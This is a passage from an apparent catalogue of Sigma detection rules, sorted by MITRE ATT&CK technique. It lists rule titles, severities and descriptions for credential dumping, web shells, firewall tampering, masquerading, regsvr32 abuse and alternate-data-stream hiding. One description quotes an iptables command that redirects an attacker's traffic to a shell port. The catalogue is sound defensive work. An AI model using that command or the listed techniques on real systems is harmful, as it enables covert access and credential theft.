    Description: Detects potential PowerShell commands or code within registry run keys
  • Registry Persistence via Explorer Run Key - Level: high
    Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
  • New RUN Key Pointing to Suspicious Folder - Level: high
    Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
  • Modify User Shell Folders Startup Value - Level: high
    Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
  • VBScript Payload Stored in Registry - Level: high
    Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
  • Potential Ryuk Ransomware Activity - Level: high
    Description: Detects Ryuk ransomware activity
  • Leviathan Registry Key Activity - Level: critical
    Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
  • Suspicious VBScript UN2452 Pattern - Level: high
    Description: Detects suspicious inline VBScript keywords as used by UNC2452
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence - Level: high
    Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
  • Kapeka Backdoor Autorun Persistence - Level: high
    Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
  • Forest Blizzard APT - Custom Protocol Handler Creation - Level: high
    Description: Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set - Level: high
    Description: Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1059.003 34
Show Rules (34)
  • Read and Execute a File Via Cmd.exe - Level: medium
    Description: Detect use of "/R <" to read and execute a file via cmd.exe
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • Remote Access Tool - ScreenConnect Command Execution - Level: low
    Description: Detects command execution via ScreenConnect RMM
  • Remote Access Tool - ScreenConnect File Transfer - Level: low
    Description: Detects file being transferred via ScreenConnect RMM
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • Remote Access Tool - ScreenConnect Temporary File - Level: low
    Description: Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
  • Powershell Execute Batch Script - Level: medium
    Description: Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
  • Potential CommandLine Path Traversal Via Cmd.EXE - Level: high
    Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
  • Read Contents From Stdin Via Cmd.EXE - Level: medium
    Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
  • Powershell Executed From Headless ConHost Process - Level: medium
    Description: Detects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution.
  • Conhost.exe CommandLine Path Traversal - Level: high
    Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Operator Bloopers Cobalt Strike Commands - Level: high
    Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
  • Operator Bloopers Cobalt Strike Modules - Level: high
    Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - Jlaive In-Memory Assembly Execution - Level: medium
    Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
  • Remote Access Tool - ScreenConnect Remote Command Execution - Level: low
    Description: Detects the execution of a system command via the ScreenConnect RMM service.
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • Potential APT FIN7 Exploitation Activity - Level: medium
    Description: Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
  • Headless Process Launched Via Conhost.EXE - Level: medium
    Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution.
attack.t1003.002 28
Show Rules (28)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Registry Dump of SAM Creds and Secrets - Level: high
    Description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored
  • SAM Dump to AppData - Level: high
    Description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • VSSAudit Security Event Source Registration - Level: informational
    Description: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.
  • Critical Hive In Suspicious Location Access Bits Cleared - Level: high
    Description: Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
  • Volume Shadow Copy Mount - Level: low
    Description: Detects volume shadow copy mount via Windows event log
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
  • HackTool - QuarksPwDump Dump File - Level: critical
    Description: Detects a dump file written by QuarksPwDump password dumper
  • NTDS.DIT Creation By Uncommon Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
  • Potential SAM Database Dump - Level: high
    Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • VolumeShadowCopy Symlink Creation Via Mklink - Level: high
    Description: Shadow Copies storage symbolic link creation using operating systems utilities
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Files with well-known filenames (sensitive files with credential data) copying
  • HackTool - Mimikatz Execution - Level: high
    Description: Detection well-known mimikatz command line arguments
  • HackTool - Pypykatz Credentials Dumping Activity - Level: high
    Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
  • HackTool - Quarks PwDump Execution - Level: high
    Description: Detects usage of the Quarks PwDump tool via commandline arguments
  • PowerShell SAM Copy - Level: high
    Description: Detects suspicious PowerShell scripts accessing SAM hives
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Shadow Copies creation using operating systems utilities, possible credential access
  • Esentutl Volume Shadow Copy Service Keys - Level: high
    Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
attack.t1505.003 28
Show Rules (28)
  • Antivirus Web Shell Detection - Level: high
    Description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Webshell Remote Command Execution - Level: critical
    Description: Detects possible command execution by web application/web shell
  • Shellshock Expression - Level: high
    Description: Detects shellshock expressions in log files
  • Linux Webshell Indicators - Level: high
    Description: Detects suspicious sub processes of web server processes
  • Suspicious Windows Strings In URI - Level: high
    Description: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
  • Webshell ReGeorg Detection Via Web Logs - Level: high
    Description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.
  • Windows Webshell Strings - Level: high
    Description: Detects common commands used in Windows webshells
  • Mailbox Export to Exchange Webserver - Level: critical
    Description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
  • Certificate Request Export to Exchange Webserver - Level: critical
    Description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
  • Exchange Set OabVirtualDirectory ExternalUrl Property - Level: high
    Description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
  • Suspicious ASPX File Drop by Exchange - Level: high
    Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
  • Suspicious File Drop by Exchange - Level: medium
    Description: Detects suspicious file type dropped by an Exchange component in IIS
  • Suspicious MSExchangeMailboxReplication ASPX Write - Level: high
    Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
  • Potential Webshell Creation On Static Website - Level: medium
    Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
  • IIS Native-Code Module Command Line Installation - Level: medium
    Description: Detects suspicious IIS native-code module installations via command line
  • Suspicious Child Process Of SQL Server - Level: high
    Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Suspicious Process By Web Server Process - Level: high
    Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
  • Webshell Tool Reconnaissance Activity - Level: high
    Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Solarwinds SUPERNOVA Webshell Access - Level: critical
    Description: Detects access to SUPERNOVA webshell as described in Guidepoint report
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • DEWMODE Webshell Access - Level: high
    Description: Detects access to DEWMODE webshell as described in FIREEYE report
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
  • Execution From Webserver Root Folder - Level: medium
    Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
attack.t1562.004 28
Show Rules (28)
  • Azure Firewall Modified or Deleted - Level: medium
    Description: Identifies when a firewall is created, modified, or deleted.
  • Azure Firewall Rule Collection Modified or Deleted - Level: medium
    Description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.
  • Bpfdoor TCP Ports Redirect - Level: medium
    Description: All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
  • Disable System Firewall - Level: high
    Description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
  • Modify System Firewall - Level: medium
    Description: Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.
  • Disabling Security Tools - Builtin - Level: medium
    Description: Detects disabling security tools
  • Ufw Force Stop Using Ufw-Init - Level: medium
    Description: Detects attempts to force stop the ufw using ufw-init
  • Flush Iptables Ufw Chain - Level: medium
    Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
  • Disabling Security Tools - Level: medium
    Description: Detects disabling security tools
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List - Level: medium
    Description: Detects when a rule has been added to the Windows Firewall exception list
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application - Level: high
    Description: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE - Level: medium
    Description: Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".
  • All Rules Have Been Deleted From The Windows Firewall Configuration - Level: high
    Description: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration
  • A Rule Has Been Deleted From The Windows Firewall Exception List - Level: medium
    Description: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall
  • The Windows Defender Firewall Service Failed To Load Group Policy - Level: low
    Description: Detects activity when The Windows Defender Firewall service failed to load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration - Level: low
    Description: Detects activity when Windows Defender Firewall has been reset to its default configuration
  • Windows Firewall Settings Have Been Changed - Level: low
    Description: Detects activity when the settings of the Windows firewall have been changed
  • Windows Firewall Profile Disabled - Level: medium
    Description: Detects when a user disables the Windows Firewall via a Profile to help evade defense.
  • New Firewall Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the addition of a new rule to the Windows firewall via netsh
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE - Level: high
    Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
  • RDP Connection Allowed Via Netsh.EXE - Level: high
    Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
  • Firewall Rule Deleted Via Netsh.EXE - Level: medium
    Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
  • Firewall Disabled via Netsh.EXE - Level: medium
    Description: Detects netsh commands that turns off the Windows firewall
  • Netsh Allow Group Policy on Microsoft Defender Firewall - Level: medium
    Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
  • Disable Microsoft Defender Firewall via Registry - Level: medium
    Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
  • Disable Windows Firewall by Registry - Level: medium
    Description: Detect set EnableFirewall to 0 to disable the Windows firewall
  • Firewall Rule Modified In The Windows Firewall Exception List - Level: low
    Description: Detects when a rule has been modified in the Windows firewall exception list
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock - Level: low
    Description: Detects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
attack.t1036.003 27
Show Rules (27)
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • Renamed PsExec - Level: high
    Description: Detects the execution of a renamed PsExec often used by attackers or malware
  • Renamed PowerShell - Level: high
    Description: Detects the execution of a renamed PowerShell often used by attackers or malware
  • Masquerading as Linux Crond Process - Level: medium
    Description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
  • Potential Homoglyph Attack Using Lookalike Characters in Filename - Level: medium
    Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Renamed Powershell Under Powershell Channel - Level: low
    Description: Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
  • Suspicious Start-Process PassThru - Level: medium
    Description: Powershell use PassThru option to start in background
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to uncommon target folder
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Potential Defense Evasion Via Binary Rename - Level: medium
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries - Level: high
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Renamed BrowserCore.EXE Execution - Level: high
    Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
  • Renamed Jusched.EXE Execution - Level: high
    Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
  • Renamed Msdt.EXE Execution - Level: high
    Description: Detects the execution of a renamed "Msdt.exe" binary
  • Renamed ProcDump Execution - Level: high
    Description: Detects the execution of a renamed ProcDump executable. This often done by attackers or malware in order to evade defensive mechanisms.
  • Suspicious Copy From or To System Directory - Level: medium
    Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
  • LOL-Binary Copied From System Directory - Level: high
    Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
  • Potential Homoglyph Attack Using Lookalike Characters - Level: medium
    Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Windows Processes Suspicious Parent Directory - Level: low
    Description: Detect suspicious parent processes of well-known Windows processes
  • Potential WerFault ReflectDebugger Registry Value Abuse - Level: high
    Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
  • Potential PendingFileRenameOperations Tampering - Level: medium
    Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
attack.t1218.010 26
Show Rules (26)
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • DNS Query Request By Regsvr32.EXE - Level: medium
    Description: Detects DNS queries initiated by "Regsvr32.exe"
  • Unsigned DLL Loaded by Windows Utility - Level: medium
    Description: Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
  • Network Connection Initiated By Regsvr32.EXE - Level: medium
    Description: Detects a network connection initiated by "Regsvr32.exe"
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Potential Regsvr32 Commandline Flag Anomaly - Level: medium
    Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
  • Potentially Suspicious Regsvr32 HTTP IP Pattern - Level: high
    Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern - Level: medium
    Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
  • Suspicious Regsvr32 Execution From Remote Share - Level: high
    Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
  • Potentially Suspicious Child Process Of Regsvr32 - Level: high
    Description: Detects potentially suspicious child processes of "regsvr32.exe".
  • Regsvr32 Execution From Potential Suspicious Location - Level: medium
    Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
  • Regsvr32 Execution From Highly Suspicious Location - Level: high
    Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
  • Regsvr32 DLL Execution With Suspicious File Extension - Level: high
    Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
  • Scripting/CommandLine Process Spawned Regsvr32 - Level: medium
    Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 - Level: medium
    Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
  • Potential EmpireMonkey Activity - Level: high
    Description: Detects potential EmpireMonkey APT activity
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1564.004 25
Show Rules (25)
  • Cmd Stream Redirection - Level: medium
    Description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • Hidden Executable In NTFS Alternate Data Stream - Level: medium
    Description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
  • Suspicious File Download From File Sharing Websites - File Stream - Level: high
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • Unusual File Download From File Sharing Websites - File Stream - Level: medium
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • HackTool Named File Stream Created - Level: high
    Description: Detects the creation of a named file stream with the imphash of a well-known hack tool
  • Exports Registry Key To an Alternate Data Stream - Level: high
    Description: Exports the target Registry key and hides it in the specified alternate data stream.
  • Unusual File Download from Direct IP Address - Level: high
    Description: Detects the download of suspicious file type from URLs with IP
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - Level: medium
    Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
  • NTFS Alternate Data Stream - Level: high
    Description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
  • Powershell Store File In Alternate Data Stream - Level: medium
    Description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • Suspicious Diantz Alternate Data Stream Execution - Level: medium
    Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
  • Suspicious Extrac32 Alternate Data Stream Execution - Level: medium
    Description: Extract data from cab file and hide it in an alternate data stream
  • PrintBrm ZIP Creation of Extraction - Level: high
    Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
  • Run PowerShell Script from ADS - Level: high
    Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
  • Potential Rundll32 Execution With DLL Stored In ADS - Level: high
    Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
  • Execute From Alternate Data Streams - Level: medium
    Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI - Level: medium
    Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
  • Use Short Name Path in Command Line - Level: medium
    Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
  • Use Short Name Path in Image - Level: medium
    Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
  • Use NTFS Short Name in Command Line - Level: medium
